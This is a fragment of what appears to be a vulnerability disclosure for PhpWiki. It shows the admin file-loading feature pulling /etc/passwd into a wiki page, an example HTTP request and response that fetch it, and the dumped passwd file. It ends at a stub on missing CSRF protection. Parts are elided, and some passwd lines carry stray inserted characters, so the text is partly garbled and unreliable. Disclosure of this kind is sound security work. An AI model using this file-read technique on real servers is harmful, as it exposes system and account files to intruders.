passwd from “plain file /etc/passwd” content is identical to current version 1 - no new revision created

Complete.

(...) #2 - Example request: GET /phpwiki/index.php/passwd HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625 Connection: keep-alive #2 - Example response: HTTP/1.1 200 OK Date: Sat, 29 Aug 2015 22:10:34 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8" Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT Cache-Control: must-revalidate Expires: Sat, 29 Aug 2015 22:10:14 GMT Vary: Cookie Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 22599 (...)

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server_{,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon},:/var/lib/colord:/bin/false usbmux:x:104:46:usbmux daemon_{,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher},:/var/lib/arpwatch:/bin/sh avahi:x:109:118:Avahi mDNS daemon_{,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:PulseAudio? daemon},:/var/run/pulse:/bin/false speech-dispatcher:x:113:29:Speech Dispatcher_{,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer},:/var/run/hald:/bin/false iodine:x:115:65534::/var/run/iodine:/bin/false postgres:x:116:127:PostgreSQL administrator_{,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:RealtimeKit?},:/proc:/bin/false saned:x:125:137::/home/saned:/bin/false devil:x:1000:1001:devil_{,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server},:/var/lib/redis:/bin/false

(...) 3/ Cross Site Request Forgery Since there is no csrf protection in application, remote attacker is able to trigger specific actions. PoC:

Loading “/etc/passwd”